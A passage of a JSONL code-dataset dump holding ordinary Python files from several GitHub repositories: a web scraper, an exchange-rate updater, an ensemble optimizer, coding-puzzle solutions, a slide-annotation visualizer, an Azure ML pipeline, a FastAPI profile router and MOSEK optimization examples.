InvestingOpinionsParser(OpinionsParser):\n def __init__(self, articleParser: ArticleParser):\n self.__articleParser = articleParser\n self.__INVESTING_URL = \"https://ru.investing.com\"\n\n def parsePage(self, link: str) -> List[Dict[str, str]]:\n if not link.startswith(\"https://ru.investing.com/currencies/\"):\n raise ArgumentError(\n \"Link parameter should be a link to investing.com website\")\n\n result = list(list())\n\n scraper = create_scraper()\n\n parsedHtml = BeautifulSoup(scraper.get(\n link).text, features=\"html.parser\")\n for articleLink in self.__getArticlesFromPage(parsedHtml):\n try:\n articleHtml = scraper.get(\n self.__INVESTING_URL + articleLink).text\n parsedArticle = self.__articleParser.parseArticle(\n BeautifulSoup(articleHtml, features=\"html.parser\"))\n\n parsedArticle['link'] = self.__INVESTING_URL + articleLink\n result.append(parsedArticle)\n except:\n pass\n\n return result\n\n def __getArticlesFromPage(self, parsedHtml: BeautifulSoup) -> List[str]:\n links = set()\n\n for link in parsedHtml.findAll(\"a\", attrs={'href': re.compile(r'/analysis/article-[0-9]+$')}):\n links.add(link.get('href'))\n\n return list(links)\n","repo_name":"airh4ck/Financial-News-Analytics-System","sub_path":"investing_grabber/src/InvestingOpinionsParser.py","file_name":"InvestingOpinionsParser.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36479465726","text":"#!/usr/bin/env python\n\"\"\"A script to update the exchange rates for 1 EUR in SEK and 1 USD in SEK.\n\n\"\"\"\n\nimport argparse\nfrom couchdb import Server\nimport datetime\nimport json\nimport requests\nimport yaml\n\n\nclass CurrencyRates(object):\n \"\"\"A class to fetch currency rates from fixer.io.\"\"\"\n def __init__(self, config_file):\n\n self.rates_fetched = False\n self._source_url = \"https://api.apilayer.com/fixer/latest\"\n\n with open(config_file, 'r') as fh:\n config = yaml.load(fh, Loader=yaml.SafeLoader)\n self._apikey = config.get('apikey')\n\n def fetch_rates(self):\n response = requests.get(self._source_url, params={'base': 'SEK', 'symbols': 'USD, EUR'}, headers={'apikey': self._apikey})\n assert response.status_code == 200\n self.data = json.loads(response.text)\n self.rates = self.data['rates']\n self.rates_fetched = True\n\n def get_rate(self, currency):\n \"\"\"Get the exchange rate for SEK to the given currency.\"\"\"\n if not self.rates_fetched:\n self.fetch_rates()\n\n return 1/self.rates[currency]\n\n\ndef get_current(db, item):\n rows = db.view(\"entire_document/by_date\", descending=True, limit=1).rows\n if len(rows) != 0:\n value = rows[0].value\n return value[item]\n return None\n\ndef check_financial_crisis(current_val, new_val, currency):\n if current_val is not None:\n rel_change = (new_val-current_val)/current_val\n print(\"INFO: Change in {} \"\n \"exchange rate: {:.3f}%\".format(currency, 100*(rel_change)))\n\n if abs(rel_change) > 0.20:\n raise Exception(\"Financial crisis or rather; something is likely wrong!\")\n\ndef main(config, fixer_io_config, push_to_server=False):\n\n c = CurrencyRates(fixer_io_config)\n # Will raise RatesNotAvailableError if not able to fetch from the api\n usd_to_sek = c.get_rate('USD')\n eur_to_sek = c.get_rate('EUR')\n\n # Inconsistent results for Euro after broken API was updated\n if isinstance(eur_to_sek, str):\n eur_to_sek = float(eur_to_sek)\n\n # Create the doc that will be uploaded\n doc = {}\n doc['Issued at'] = datetime.datetime.now().isoformat()\n # I know it's bad practice to call the _source_url method,\n # but if it breaks it breaks.\n doc['Data source'] = \"Fixer.io via ({})\".format(c._source_url)\n doc['USD_in_SEK'] = usd_to_sek\n doc['EUR_in_SEK'] = eur_to_sek\n\n # Load the statusdb database\n with open(config) as settings_file:\n server_settings = yaml.load(settings_file, Loader=yaml.SafeLoader)\n\n url_string = 'https://{}:{}@{}'.format(\n server_settings['statusdb'].get('username'),\n server_settings['statusdb'].get('password'),\n server_settings['statusdb'].get('url')\n )\n couch = Server(url_string)\n\n db = couch['pricing_exchange_rates']\n\n # Check that new is not too strange compared to current.\n # This is a safety measure so that we have lower risk of having erroneus\n # exchange rates in the db.\n current_usd = get_current(db, 'USD_in_SEK')\n current_eur = get_current(db, 'EUR_in_SEK')\n\n check_financial_crisis(current_usd, usd_to_sek, 'USD')\n check_financial_crisis(current_eur, eur_to_sek, 'EUR')\n\n # Completely conserved currencies are also strange.\n if (current_eur is not None) and (current_usd is not None):\n # This assumes the script is not ran too often\n # (api udpates once per day)\n small_number = 0.0000000001\n if (abs(current_usd - usd_to_sek) < small_number) and \\\n (abs(current_eur - eur_to_sek) < small_number):\n raise Exception(\"Super stable currencies? Stale api would be my guess.\")\n\n if push_to_server:\n db.save(doc)\n else:\n print(doc)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--statusdb_config', required=True,\n help='The statusdb_cred.yaml file.')\n parser.add_argument('--fixer_io_config', required=True,\n help='The fixer_io.yaml file.')\n parser.add_argument('--push', action='store_true', help='Use this tag to '\n \"make the script push the changes to statusdb\")\n\n args = parser.parse_args()\n main(args.statusdb_config, args.fixer_io_config, push_to_server=args.push)\n","repo_name":"SciLifeLab/standalone_scripts","sub_path":"update_exchange_rates.py","file_name":"update_exchange_rates.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"32353533054","text":"import logging\n\nimport numpy as np\n\nfrom beo import bo\nfrom beo.util import trace\nfrom beo import ensemble\n\n\ndef get_valid_jobs(expt, expt_trace):\n # Locate valid jobs (with completed predictions) from the expt trace\n # TODO: maybe do it directly from the prediction cache?\n if len(expt_trace) > 0:\n T = trace.inside_out(expt_trace, filter_keys=['choices'], \n verbose=False)\n valid_jobs = (~T['raised_exception']) & (~T['timeout'])\n valid_job_ids = T['job_id'][valid_jobs]\n\n invalid_jobs = T['raised_exception'] | T['timeout']\n invalid_job_ids = T['job_id'][invalid_jobs]\n else:\n valid_jobs = []\n valid_job_ids = []\n\n invalid_jobs = []\n invalid_job_ids = []\n return valid_jobs, valid_job_ids, invalid_jobs, invalid_job_ids\n\n\nclass BeoFwg(bo.BayesianOptimizer):\n '''\n Utility object to perform a hyper-parameter optimization. Provides\n fitness values for a forward greedy ensemble construction procedure.\n '''\n def __init__(self, ensemble_loss_func,\n replace_members, n_classifiers, \n **kwargs):\n '''\n Parameters:\n -----------\n\n ensemble_loss_func: function determining the `loss` of an ensemble given\n its predictions\n\n replace_members: will leave classifiers in the pool instead of removing\n them, effectively allowing the same classifier to be present \n multiple times in the ensemble\n\n n_classifiers: number of classifiers in the ensemble\n '''\n\n # Force the base class to store predictions on validation split(s)\n kwargs['store_pred_cache'] = True\n super().__init__(**kwargs)\n\n self.num_classifiers = n_classifiers\n self.ensemble_loss_func = ensemble_loss_func\n self.replace_members = replace_members\n\n # assume all labels are present in the test set\n self.u_labels = np.unique(self.test_pred_cache['labels'][0])\n\n # Evaluate the performance of a potential ensemble at given points\n def eval(self, expt, expt_trace, complete, values):\n return_info = {}\n\n bo.sync_hdf5_pred_cache(self.pred_cache_file, self.val_pred_cache)\n\n #Whose turn is it in the 'round-robin'?\n self.i = expt.get('i', 0) % self.num_classifiers\n logging.info(\"Optimizing classifier %i\" % self.i)\n\n #If the last iteration wasn't on the same classifier,\n #reset the chooser module to force a restart and burn-in\n if len(expt_trace) > 0 and expt_trace[-1]['i'] != self.i:\n return_info['clear_chooser_pkl'] = True\n\n losses_with_failed, ens_losses, ids, cur_ensemble = \\\n self.compute_loss_refresh_member_i(self.i,\n expt, expt_trace, values)\n\n # increment for next iteration, expt is saved on file system and\n # distributed to other nodes\n expt.i = self.i + 1\n\n return losses_with_failed, ids, return_info\n\n def update(self, job_id, job_results, expt, expt_trace,\n complete, values):\n # Set during first call to eval, the index of the classifier\n # targeted by this iteration. since expt.i can be affected by other\n # processes running fwgo, we need to store it explicitly\n i = self.i\n losses_with_failed, ens_losses, ids, cur_ensemble = \\\n self.compute_loss_refresh_member_i(i, expt,\n expt_trace, values, update_ensemble=True)\n\n if len(ens_losses) > 0:\n #compute test predictions for given ensemble --\n cur_ensemble_ids = list(cur_ensemble['choices'].values())\n\n # Test predictions are always evaluated the same, they're just\n # not exactly computed on the same data.\n ens_test_error, ens_test_loss = ensemble.eval_ensemble(\n cur_ensemble_ids, self.test_pred_cache, \n self.ensemble_loss_func, regression=False, \n u_labels=self.u_labels)\n\n # Give the proper label to testing error, as they are not the same\n if self.eval_params.get('retrain', True):\n cur_ensemble['test_TV_err'] = ens_test_error\n else:\n cur_ensemble['test_T_err'] = ens_test_error\n\n #losses = np.average(ensemble_loss_func(val_labels, predictions))\n\n # return dict that will be stored in the trace\n return {'ensemble': cur_ensemble, 'i': i}\n\n def compute_loss_refresh_member_i(self, i, expt, expt_trace, values,\n update_ensemble=True, bag_classifiers=False):\n '''\n Updates member `i` in the ensemble, i.e. remove it and compute losses\n for putting back any other classifier in the pool\n '''\n #current ensemble, stored in the resilient expt structure\n cur_ensemble = expt.get('cur_ensemble', {'choices': {}})\n\n choices = cur_ensemble['choices'].copy()\n #remove classifier for current iteration (i.e. make a choice again)\n if i in choices:\n choices.pop(i)\n\n valid_jobs, valid_job_ids, invalid_jobs, invalid_job_ids =\\\n get_valid_jobs(expt, expt_trace)\n\n if self.replace_members:\n # leave chosen classifiers in the pool\n remaining_complete = valid_job_ids\n else:\n remaining_complete = np.array([idx for idx in valid_job_ids if\n idx not in choices.values()], dtype=int)\n\n if bag_classifiers and len(remaining_complete) > 0:\n remaining_complete = np.random.choice(remaining_complete, \n int(0.66*len(remaining_complete)), replace=False)\n\n #measure fitnesses \n logging.info(\"Choices before eval: %s\" % choices)\n ens_errors, ens_losses = ensemble.eval_combinations(\n list(choices.values()), remaining_complete, self.val_pred_cache, \n self.ensemble_loss_func, False, self.u_labels)\n\n #Make a new choice given the pool of classifiers available\n if len(ens_errors) > 0:\n # Sorts by last key first, ens_losses, then individual validation\n # errors, with a last randomly sampled tiebreaking entry\n min_i = np.lexsort((\n np.random.sample(len(ens_losses)), \n values[remaining_complete], \n ens_losses))[0]\n my_choice = remaining_complete[min_i]\n\n if update_ensemble:\n cur_ensemble['choices'][i] = my_choice\n cur_ensemble['val_T_err'] = ens_errors[min_i]\n expt.cur_ensemble = cur_ensemble \n logging.info(\"Choices: %s\" % cur_ensemble['choices'])\n logging.info(\"Single best validation error: %f\" % \n np.min(values))\n logging.info(\"Ensemble validation error : %f\" % \n ens_errors[min_i])\n\n logging.debug(\"Ensemble losses (%s): %s\" % (self.ensemble_loss_func,\n ens_losses))\n \n invalid_jobs_losses = values[invalid_job_ids]\n\n # Put back losses of incomplete jobs\n losses_with_failed = np.hstack((ens_losses, invalid_jobs_losses))\n ids = np.hstack((remaining_complete, invalid_job_ids)).astype(int)\n\n return losses_with_failed, ens_losses, ids, cur_ensemble\n","repo_name":"jclevesque/bayes_ens_opt","sub_path":"beo/beo_fwg.py","file_name":"beo_fwg.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70009467114","text":"# # My Solution\n# class Solution:\n# def longestCommonPrefix(self, strs):\n# small = strs[0]\n# for i in range(len(strs)):\n# if len(strs[i]) < len(small) :\n# small = strs[i]\n# # small = flow\n# for ele in strs:\n# for j in range(len(small)):\n# if small not in ele[:len(small)] :\n# small = small[:-1]\n# if small == '' :\n# return ''\n# else:\n# break\n# return small\n \n# sol = Solution()\n# strs = [\"flower\",\"flow\",\"flight\"]\n# result = sol.longestCommonPrefix(strs)\n# print(result)\n\n\nclass Solution:\n def longestCommonPrefix(self, v):\n ans=\"\"\n v=sorted(v)\n print(v)\n first=v[0]\n last=v[-1]\n for i in range(min(len(first),len(last))):\n if(first[i]!=last[i]):\n return ans\n ans+=first[i]\n return ans \nsol = Solution()\nstrs = [\"flower\",\"flow\",\"flight\"]\nresult = sol.longestCommonPrefix(strs)\nprint(result)","repo_name":"hiaman80/Python","sub_path":"LeetCode_String.py","file_name":"LeetCode_String.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4678301954","text":"import flask\n\nimport app.models\n\n\ndef render_template( source, **context):\n \"\"\"\n Making a specialized render_template function that defaults some context in.\n This should be used any time we're rendering a template, so that defaults\n are always used.\n\n *Arguments:*\n\n :``source``: `str` the name of the template to render\n\n \"\"\"\n\n post_types = [ ]\n\n for post_type in app.models.Post_Type.get_ordered():\n if post_type.posts:\n post_types.append((post_type.type_url_name, post_type.type_name))\n\n return flask.render_template(source, post_types=post_types, **context)\n","repo_name":"hunnybear/website","sub_path":"src/hunb_site/app/views/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12860665946","text":"# boj 16918 봄버맨 s1\n# noj.am.16918\nimport sys\nfrom collections import deque\n\ninp = sys.stdin.readline\nR, C, N = map(int, inp().split())\ngrid = [list(inp().rstrip()) for _ in range(R)]\nbombLoc = deque()\ndx, dy = [1, -1, 0, 0], [0, 0, 1, -1]\n\n\ndef whichBomb():\n for i in range(R):\n for j in range(C):\n if grid[i][j] == \"O\": # 폭탄이 있는 위치 찾기\n bombLoc.append((i, j))\n\n\ndef setupBomb():\n global grid\n grid = [[\"O\"] * C for _ in range(R)]\n\n\ndef bomb():\n while bombLoc:\n x, y = bombLoc.popleft()\n grid[x][y] = \".\"\n for i in range(4):\n X, Y = x + dx[i], y + dy[i]\n if 0 <= X < R and 0 <= Y < C:\n grid[X][Y] = \".\"\n\n\nN -= 1 # 처음 1초후는 변화 없음\nwhile N > 0:\n whichBomb()\n setupBomb()\n N -= 1 # 2차로 폭탄 설치 후 1초가 지나야 터짐\n if N == 0:\n break\n bomb()\n N -= 1 # 시간 흐름\n\nfor arr in grid: # 결과 출력\n print(\"\".join(arr))\n","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/BOJ/16918_봄버맨_s1/16918.py","file_name":"16918.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5718597494","text":"import argparse\nimport PIL.Image\nimport geojson\nimport rasterio.features\nimport numpy as np\nimport shapely\nimport openslide\nimport json\n\nfrom util import group_by_class, scale_shapes, get_code_to_color_from_profile\n\n\ndef main(args):\n with open(args.profile_path, 'r') as file:\n json_data = json.loads(file.read())\n code_to_color = get_code_to_color_from_profile(json_data)\n\n # Load Slide\n slide = openslide.open_slide(args.svs_path)\n slide_img = slide.read_region((0,0), len(slide.level_dimensions)-1, slide.level_dimensions[-1]).convert('RGB')\n\n # Get target resolution\n mpp = float(slide.properties['openslide.mpp-x'])\n full_res = slide.level_dimensions[0]\n downsample_rate = args.output_resolution / mpp\n target_res = np.round(np.array(full_res) / downsample_rate).astype(int)\n\n # Load Annotations\n geoj = geojson.load(open(args.annotation_path, 'rb'))\n shapes_by_class = group_by_class(geoj)\n shapes_by_class = scale_shapes(shapes_by_class, downsample_rate)\n\n # Rasterize Annotations\n annotation_img, _ = visualize_annotations(code_to_color, shapes_by_class, [target_res[0], target_res[1]])\n\n # Blend Annotations and Slide\n PIL.Image.blend(slide_img.resize(target_res), annotation_img, alpha=args.alpha).save(args.output_path)\n\n\ndef visualize_annotations(class_to_color, shapes_by_class, resolution):\n annotation_img = np.zeros(np.array((resolution[1], resolution[0], 3)), dtype=np.uint8)\n area_per_class = {}\n for class_name in shapes_by_class.keys():\n img = rasterio.features.rasterize([shapes_by_class[class_name]], out_shape=np.array((resolution[1], resolution[0])))\n annotation_img[img != 0] = np.array(class_to_color[class_name])\n\n area_per_class[class_name] = shapely.area(shapes_by_class[class_name])\n annotation_img = PIL.Image.fromarray(annotation_img)\n\n return annotation_img, area_per_class\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Visualisation of Whole Slide Image (WSI) and annotations.')\n\n parser.add_argument('--svs_path', type=str, required=True, help='Path to Whole Slide Image (WSI) as .svs')\n parser.add_argument('--annotation_path', type=str, required=True,\n help='Annotations as .geojson exported from QuPath')\n parser.add_argument('--profile_path', type=str, required=True, help='Path to the Tissue Maps profile as .json')\n parser.add_argument('--output_path', type=str, required=True, help='Path where the output image is saved')\n parser.add_argument('--output_resolution', type=float, required=True,\n help='Resolution of the output in micro meters per pixel.')\n parser.add_argument('--alpha', type=float, default=0.5, help='Alpha value for overlay of annotations and WSI')\n\n args = parser.parse_args()\n\n print(f\"Processing WSI from: {args.svs_path}\")\n print(f\"\\tApplying annotations from: {args.annotation_path}\")\n print(f\"\\tUsing Tissue Types profile: {args.profile_path}\")\n print(f\"\\tOutput will be generated with a resolution of: {args.output_resolution} micrometer per pixel\")\n print(f\"\\tAlpha for overlay: {args.alpha}\")\n\n main(args)","repo_name":"human-centered-ai-lab/WSIDOM","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18194637262","text":"from azureml.pipeline.core import Pipeline, PipelineData, StepSequence\nfrom azureml.pipeline.steps import PythonScriptStep\nfrom azureml.pipeline.steps import DataTransferStep\nfrom azureml.pipeline.core import PublishedPipeline\nfrom azureml.pipeline.core.graph import PipelineParameter\nfrom azureml.core import ScriptRunConfig\nfrom azureml.core import Workspace, Run, Experiment, Datastore\nfrom azureml.core.compute import AmlCompute\nfrom azureml.core.compute import ComputeTarget, DataFactoryCompute\nfrom azureml.data.data_reference import DataReference\n\naml_compute_target = \"cpu\"\nproject_folder = '.'\n\nws = Workspace.from_config()\n\n\n# Runconfig\nfrom azureml.core.runconfig import CondaDependencies, RunConfiguration\ncd = CondaDependencies.create(pip_packages=[\"sklearn\", \"azureml-defaults\"])\namlcompute_run_config = RunConfiguration(conda_dependencies=cd)\n\n# Make sure the compute target exists\ntry:\n aml_compute = AmlCompute(ws, aml_compute_target)\n print(\"found existing compute target.\")\nexcept:\n print(\"compute target not found. exiting\")\n\n#Data transfer example\n\ndata_factory_name = \"adf\"\ndata_factory_compute = DataFactoryCompute(ws, data_factory_name)\n\n# For model reproducibility, we want to ensure that we preserve the images we're actually using to train from the larger data lake\n\nsource_ds = Datastore.get(ws, 'amlvdaik14969151586')\ndest_ds = ws.get_default_datastore()\n\norig_images = DataReference(\n datastore=source_ds,\n data_reference_name=\"origin_images\",\n path_on_datastore= '')\n\ndest_images = DataReference(\n datastore=dest_ds,\n data_reference_name=\"destination_images\",\n path_on_datastore= 'my_training_data')\n\ntransfer_images = DataTransferStep(\n name=\"transfer_images\",\n source_data_reference=orig_images,\n destination_data_reference=dest_images,\n compute_target=data_factory_compute)\n\nsteps = [transfer_images]\n\nprint(\"Step lists created\")\n\npipeline1 = Pipeline(workspace=ws, steps=steps)\nprint (\"Pipeline is built\")\n\npipeline1.validate()\nprint(\"Pipeline validation complete\")\n\npipeline_run1 = Experiment(ws, 'justdatatransfer').submit(pipeline1)\nprint(\"Pipeline is submitted for execution\")","repo_name":"sumanmsft/https-github.com-sumigator-DemoDevOpsML","sub_path":"reference/datatransferpipeline.py","file_name":"datatransferpipeline.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3985132001","text":"import os\n\nfrom fastapi import APIRouter, Depends, UploadFile\nfrom sqlalchemy.orm import Session\n\nfrom database.config import get_db\nfrom database.models import Users\nfrom database.schemas import ProfileResponse, UserBaseUpdate\nfrom utils.auth import get_current_user\n\n\nrouter = APIRouter(prefix=\"/profile\", tags=[\"Profile - Information\"])\n\n\n@router.post(\"/picture\")\nasync def set_profile_picture(\n file: UploadFile,\n user=Depends(get_current_user),\n database: Session = Depends(get_db),\n):\n \"\"\"Function to set user profile picture\"\"\"\n\n content = await file.read()\n\n if file.filename:\n with open(os.path.join(\"pictures\", file.filename), \"wb\") as pictures_folder:\n pictures_folder.write(content)\n\n database.query(Users).filter(Users.id == user.id).update(\n {\"picture\": file.filename}\n )\n database.commit()\n database.flush()\n\n return {\"filename\": file.filename}\n\n\n@router.get(\"/{username}\", response_model=ProfileResponse)\ndef get_profile(username: str, database: Session = Depends(get_db)):\n \"\"\"Function to get user profile\"\"\"\n\n user_profile = database.query(Users).filter(Users.username == username).first()\n\n return user_profile\n\n\n@router.get(\"/\", response_model=ProfileResponse)\ndef get_current_profile(\n user=Depends(get_current_user), database: Session = Depends(get_db)\n):\n \"\"\"Function to get user profile logged in by JWT token\"\"\"\n # test\n\n user_profile = database.query(Users).filter(Users.id == user.id).first()\n\n return user_profile\n\n\n#\n# @router.get('/')\n# async def test_profile():\n# return \"hello world\"\n#\n@router.post(\"/\")\ndef update_profile(\n body: UserBaseUpdate,\n user=Depends(get_current_user),\n database: Session = Depends(get_db),\n):\n database.query(Users).filter(Users.id == user.id).update(\n {\n \"first_name\": body.first_name,\n \"last_name\": body.last_name,\n \"username\": body.username,\n \"about\": body.about,\n }\n )\n\n database.commit()\n","repo_name":"tovarc/social-app-backend","sub_path":"routers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12427503410","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 24 11:10:27 2018\r\n\r\n@author: prita\r\n\"\"\"\r\n\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom time import time\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, MinMaxScaler, StandardScaler\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.naive_bayes import BernoulliNB\r\n\r\n## Step 1 - Data collection : Download the data\r\nHouseVotes = pd.read_csv(\"C:\\PritamData\\Stats_With_R\\Homework\\HouseVotes84.csv\")\r\n\r\n## Step 2: Data exploration and preparation : Exploring and preparing the data ---- \r\nprint(\"\\nNo of rows and columns\\n\", HouseVotes.shape) ## No of rows and columns\r\nprint(\"\\nDatatypes \\n\", HouseVotes.dtypes) ## Structure\r\nprint(\"\\nCount of Spam\\n\",HouseVotes.groupby('Class').size()) ## count\r\nprint(\"\\nLenght \", len(HouseVotes.Class))\r\n\r\nX = HouseVotes.iloc[:,2:]\r\ny = HouseVotes.iloc[:,1]\r\n\r\n## Step 2: Data exploration and preparation : Feature Scaling \r\n\r\n#for i in X_train.columns.values:\r\nX = X.replace({'V1': {'y': 1, 'n': 0}})\r\nX = X.replace({'V2': {'y': 1, 'n': 0}})\r\nX = X.replace({'V3': {'y': 1, 'n': 0}})\r\nX = X.replace({'V4': {'y': 1, 'n': 0}})\r\nX = X.replace({'V5': {'y': 1, 'n': 0}})\r\nX = X.replace({'V6': {'y': 1, 'n': 0}})\r\nX = X.replace({'V7': {'y': 1, 'n': 0}})\r\nX = X.replace({'V8': {'y': 1, 'n': 0}})\r\nX = X.replace({'V9': {'y': 1, 'n': 0}})\r\nX = X.replace({'V10': {'y': 1, 'n': 0}})\r\nX = X.replace({'V11': {'y': 1, 'n': 0}})\r\nX = X.replace({'V12': {'y': 1, 'n': 0}})\r\nX = X.replace({'V13': {'y': 1, 'n': 0}})\r\nX = X.replace({'V14': {'y': 1, 'n': 0}}) \r\nX = X.replace({'V15': {'y': 1, 'n': 0}})\r\nX = X.replace({'V16': {'y': 1, 'n': 0}}) \r\n\r\n##Fill every column with its own most frequent value\r\nX = X.apply(lambda x:x.fillna(x.value_counts().index[0]))\r\n\r\n#Splitting the dataset into the Training set and Test set\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.23, random_state = 0)\r\n\r\nprint(\"\\nSize of Training Dataset\\n\",y_train.count()) ## count for y_train\r\nprint(\"\\nSize of Testing Dataset\\n\",y_test.count()) ## count for y_test\r\nprint(\"\\nProportion of democrat - Train\\n\",y_train.value_counts() / 334 *100) ## count\r\nprint(\"\\nProportion of republican - Test \\n\",y_test.value_counts() / 101 * 100) ## count\r\n\r\n## Step 3: Model Training: Training a model on the data ----\r\n# Fitting Naive Bayes to the Training set\r\nclassifier = BernoulliNB()\r\nclassifier.fit(X_train, y_train)\r\n\r\n## Step 4: Model Evaluation : Evaluating model performance ----\r\nt0=time()\r\n# Predicting the Test set results\r\ny_pred = classifier.predict(X_test)\r\nprint(\"\\nPredictions time:\", round(time()-t0, 3), \"s\")\r\nprint(\"Confusion matrix after prediction\\n\", confusion_matrix(y_test, y_pred))\r\nprint(\"Accuracy: \", accuracy_score(y_test, y_pred)*100, \"%\")\r\nprint(\"Classification Report: \", classification_report(y_test, y_pred))\r\n\r\n## Step 5: Model Improvement : Improving model performance ----\r\n","repo_name":"pritambarlota/Academic-Projects","sub_path":"NaiveBayes_HouseVotes84.py","file_name":"NaiveBayes_HouseVotes84.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25933369150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('master', '0028_localesnulos'),\n ('temp', '0003_baseaccpreciototal'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TablaFinalAccPrecioTotal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('codigoMaterial', models.IntegerField()),\n ('material', models.CharField(max_length=100)),\n ('con', models.FloatField(default=0)),\n ('sin', models.FloatField(default=0)),\n ('sobre', models.FloatField(default=0)),\n ('oficina', models.ForeignKey(to='master.OficinaVentas')),\n ('periodo', models.ForeignKey(to='master.Periodo')),\n ('sector', models.ForeignKey(to='master.Sector')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"Teino1978-Corp/Teino1978-Corp-light_.gitignore","sub_path":"light_temp_migrations_0004_tablafinalaccpreciototal.py","file_name":"light_temp_migrations_0004_tablafinalaccpreciototal.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19834595947","text":"import sys\nimport mosek\nimport mosek.fusion\nfrom mosek.fusion import *\nfrom mosek import LinAlg\n\n\"\"\"\n Assuming that e is an NxN expression, return the lower triangular part as a vector.\n\"\"\"\ndef vec(e):\n N = e.getShape()[0]\n\n msubi = range(N * (N + 1) // 2)\n msubj = [i * N + j for i in range(N) for j in range(i + 1)]\n mcof = [2.0**0.5 if i !=\n j else 1.0 for i in range(N) for j in range(i + 1)]\n\n S = Matrix.sparse(N * (N + 1) // 2, N * N, msubi, msubj, mcof)\n return Expr.mul(S, Expr.flatten(e))\n\ndef nearestcorr(A):\n N = A.numRows()\n\n # Create a model\n with Model(\"NearestCorrelation\") as M:\n # Setting up the variables\n X = M.variable(\"X\", Domain.inPSDCone(N))\n t = M.variable(\"t\", 1, Domain.unbounded())\n\n # (t, vec (A-X)) \\in Q\n v = vec(Expr.sub(A, X))\n M.constraint(\"C1\", Expr.vstack(t, v), Domain.inQCone())\n\n # diag(X) = e\n M.constraint(\"C2\", X.diag(), Domain.equalsTo(1.0))\n\n # Objective: Minimize t\n M.objective(ObjectiveSense.Minimize, t)\n M.writeTask('nearcor.task')\n M.writeTask('nearcor.cbf')\n M.solve()\n\n return X.level(), t.level()\n\ndef nearestcorr_nucnorm(A, gammas):\n N = A.numRows()\n with Model(\"NucNorm\") as M:\n # Setup variables\n t = M.variable(\"t\", 1, Domain.unbounded())\n X = M.variable(\"X\", Domain.inPSDCone(N))\n w = M.variable(\"w\", N, Domain.greaterThan(0.0))\n\n # D = diag(w)\n D = Expr.mulElm(Matrix.eye(N), Var.repeat(w, 1, N))\n # (t, vec (X + D - A)) in Q\n M.constraint(Expr.vstack(t, vec(Expr.sub(Expr.add(X, D), A))),\n Domain.inQCone())\n\n result = []\n for g in gammas:\n # Objective: Minimize t + gamma*Tr(X)\n M.objective(ObjectiveSense.Minimize, Expr.add(\n t, Expr.mul(g, Expr.sum(X.diag()))))\n M.solve()\n\n # Find eigenvalues of X and compute its rank\n d = [0.0] * int(N)\n LinAlg.syeig(mosek.uplo.lo, N, X.level(), d)\n result.append(\n (g, t.level(), sum([d[i] > 1e-6 for i in range(N)]), X.level()))\n\n return result\n\nif __name__ == '__main__':\n N = 5\n A = Matrix.dense(N, N, [0.0, 0.5, -0.1, -0.2, 0.5,\n 0.5, 1.25, -0.05, -0.1, 0.25,\n -0.1, -0.05, 0.51, 0.02, -0.05,\n -0.2, -0.1, 0.02, 0.54, -0.1,\n 0.5, 0.25, -0.05, -0.1, 1.25])\n\n gammas = [0.1 * i for i in range(11)]\n\n X, t = nearestcorr(A)\n\n print(\"--- Nearest Correlation ---\")\n print(\"X = \")\n print(X.reshape((N, N)))\n print(\"t = \", t)\n\n print(\"--- Nearest Correlation with Nuclear Norm---\")\n for g, res, rank, X in nearestcorr_nucnorm(A, gammas):\n print(\"gamma=%f, res=%e, rank=%d\" % (g, res, rank))","repo_name":"OxDuke/Bilevel-Planner","sub_path":"third_party/mosek/9.0/tools/examples/fusion/python/nearestcorr.py","file_name":"nearestcorr.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"70800500074","text":"# solve for x\n# X+4=9\n\ndef solve(name):\n x , add, num1, equal, num2=name.split()\n num1, num2=int(num1),int(num2)\n print(\"X = \"+str(num2-num1))\nname=input(\"enter your algebric equation 